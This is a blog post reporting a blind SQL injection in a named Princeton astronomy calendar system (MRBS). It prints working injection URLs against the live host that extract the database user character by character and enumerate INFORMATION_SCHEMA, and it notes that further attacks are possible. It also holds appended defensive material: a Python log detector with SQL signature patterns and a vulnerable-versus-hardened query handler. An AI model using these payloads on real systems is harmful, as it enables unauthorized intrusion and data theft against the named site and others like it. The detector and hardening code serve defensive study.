Princeton Blind SQL Injection

Posted on 18:01 by Xianur0

I reported the bug to the admin, and promised him I would not disclose it until it had been fixed:

http://calendar.astro.princeton.edu/mrbs/

(search Google for: astro.princeton.edu/mrbs
and you will see which CMS they used, hehe)

Message:

Good evening, my nickname is Xianur0. I am writing to report security flaws in your system; to begin with, a Blind SQL Injection (unauthorized querying of your SQL system (MySQL)), for example:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=109
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),2,1))=114
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),3,1))=98
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),4,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),5,1))=64
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),6,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),7,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),8,1))=99
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),9,1))=97
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),10,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),11,1))=104
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),12,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),13,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),14,1))=116

When the SQL condition is incorrect, the table of rooms stays empty or has a single element; when these queries are correct, the table shows all the rooms.

Putting the results in order as ASCII codes:
109,114,98,115,64,108,111,99,97,108,104,111,115,116

and translating them into a readable string, we get:
mrbs@localhost

This is the MySQL user used by the system. Now we make another query to identify which tables are permitted for that user in MySQL:
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (*) FROM INFORMATION_SCHEMA.TABLES)
There the database is INFORMATION_SCHEMA and the table is TABLES; this database contains information about MySQL (for example: tables, columns, etc.). Now we find out how many databases are in MySQL:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES) = 20

This means that there are 20 databases recorded in the INFORMATION_SCHEMA, and if we continue from the first step (in which we obtained the user), the structure of the system can be obtained, users obtained, and an attack carried out on the system.


Profile: http://milw0rm.com/author/1657
Nick: Xianur0
Web: http://xianur0.blogspot.com
Email: uxmal666@gmail.com

Sorry For My Bad English
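The probe series in the message above leaves a recognisable trace in the web server's access log: a parameter that should only ever carry an integer arrives with SQL text appended, and consecutive requests differ only in the constant being compared. The detector below is an added example for defenders (not code from the original post or from MRBS): it parses constructed common-log-format lines, flags non-numeric values in parameters assumed to be integers, and groups boolean-blind probe series by client, path, parameter and payload template. The client IPs, the application path and the list of integer parameters are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (hypothetical client IPs and booking-app path);
# the payload shapes mirror the probe URLs quoted in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Aug/2008:18:01:02 -0400] "GET /mrbs/month.php?year=2008&month=08&area=1 HTTP/1.1" 200 5120
203.0.113.5 - - [12/Aug/2008:18:01:05 -0400] "GET /mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=109 HTTP/1.1" 200 5120
203.0.113.5 - - [12/Aug/2008:18:01:06 -0400] "GET /mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=110 HTTP/1.1" 200 1980
203.0.113.5 - - [12/Aug/2008:18:01:07 -0400] "GET /mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),2,1))=114 HTTP/1.1" 200 5120
203.0.113.5 - - [12/Aug/2008:18:02:00 -0400] "GET /mrbs/month.php?year=2008&month=08&area=1%20AND%20(SELECT%20count(*)%20FROM%20INFORMATION_SCHEMA.TABLES)=20 HTTP/1.1" 200 1980
198.51.100.7 - - [12/Aug/2008:18:03:00 -0400] "GET /mrbs/month.php?year=2008&month=09&area=2 HTTP/1.1" 200 4870
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Parameters the calendar pages are assumed to treat as integers.
INT_PARAMS = {"year", "month", "day", "area", "room"}

# SQL fragments that have no business inside a numeric parameter value.
SQL_SIGNATURE = re.compile(
    r"(?i)\b(select|union|and|or)\b|information_schema|ascii\s*\(|substring\s*\(|sleep\s*\(|benchmark\s*\("
)

# Trailing comparison against a constant: the part that changes between blind probes.
PROBE_TAIL = re.compile(r"\s*(=|<=|>=|<>|!=|<|>)\s*(?P<const>\d+)\s*$")


def parse_line(line):
    """Split one log line into fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs decodes both '+' and '%20' to spaces and splits on the first '='.
    rec["params"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def classify(params):
    """Return (param, reason) findings for one request's parameters."""
    findings = []
    for name, value in params.items():
        if name in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((name, "non-numeric value in integer parameter"))
        if SQL_SIGNATURE.search(value):
            findings.append((name, "SQL keyword or function in parameter"))
    return findings


def analyze(log_text):
    """Count flagged requests per client and reconstruct boolean-blind probe series."""
    flagged_by_ip = defaultdict(int)
    probe_series = defaultdict(set)  # (ip, path, param, template) -> compared constants
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec["params"])
        if not findings:
            continue
        flagged_by_ip[rec["ip"]] += 1
        for name in {n for n, _ in findings}:
            value = rec["params"][name]
            m = PROBE_TAIL.search(value)
            if m:
                template = value[: m.start()]
                probe_series[(rec["ip"], rec["path"], name, template)].add(m.group("const"))
    series = [
        {"ip": ip, "path": path, "param": param, "template": template,
         "constants": sorted(consts, key=int)}
        for (ip, path, param, template), consts in sorted(probe_series.items())
        if len(consts) >= 2  # same payload, different constant: a blind oracle being walked
    ]
    return {"flagged_by_ip": dict(flagged_by_ip), "boolean_probe_series": series}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, n in report["flagged_by_ip"].items():
        print(f"{ip}: {n} suspicious requests")
    for s in report["boolean_probe_series"]:
        print(f"probe series from {s['ip']} on {s['path']} param {s['param']}: {s['constants']}")
```

The signature list is deliberately small and will produce false positives on free-text parameters (a room named "Lab or Hall" matches `\bor\b`), which is why it is only applied after the type check narrows the scope to parameters that should be integers; in practice the per-client count and the probe-series grouping are the signals worth alerting on.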

Well, the message serves as an example of manual Blind SQL Injection xD...
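What makes the oracle in the message work is that the `area` parameter is spliced into the SQL text, so any condition appended to it is evaluated by the database and the room table becomes a true/false indicator. The following added example (not the MRBS code, which the post does not show; it uses Python with sqlite3 as a stand-in for the PHP/MySQL stack) places that pattern next to a handler that validates the parameter as an integer and binds it as a query parameter. The table and column names are assumptions.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for a booking system's rooms table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE room (id INTEGER PRIMARY KEY, area_id INTEGER, room_name TEXT)")
    conn.executemany(
        "INSERT INTO room (area_id, room_name) VALUES (?, ?)",
        [(1, "Room A"), (1, "Room B"), (2, "Lab")],
    )
    return conn


def rooms_vulnerable(conn, area):
    """Request parameter concatenated into the SQL text.

    Whatever follows the number becomes part of the WHERE clause: a true
    condition returns every room in the area, a false one returns nothing,
    which is exactly the oracle the post uses."""
    sql = "SELECT room_name FROM room WHERE area_id = " + area + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def rooms_hardened(conn, area):
    """Validate the expected type first, then bind the value as a parameter.

    re.fullmatch on ASCII digits is used instead of str.isdigit(), which also
    accepts Unicode digits that int() rejects."""
    if not re.fullmatch(r"[0-9]+", area):
        raise ValueError("area must be a non-negative integer")
    rows = conn.execute(
        "SELECT room_name FROM room WHERE area_id = ? ORDER BY id", (int(area),)
    )
    return [row[0] for row in rows]


def hardened_rejects(conn, area):
    """True when the hardened handler refuses the value outright."""
    try:
        rooms_hardened(conn, area)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = build_db()
    print(rooms_vulnerable(conn, "1"))            # every room in area 1
    print(rooms_vulnerable(conn, "1 AND 1=0"))    # empty list: the oracle's "false"
    print(rooms_vulnerable(conn, "1 AND 1=1"))    # full list: the oracle's "true"
    print(rooms_hardened(conn, "1"))              # same result as the first call
    print(hardened_rejects(conn, "1 AND 1=1"))    # True: never reaches the database
```

Either measure alone closes the oracle (a bound parameter is compared as a value, never parsed as SQL), but doing both gives a clean rejection to log and alert on, which is the behaviour the detector above keys off.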

Hehe, even the big ones have their bad moments...
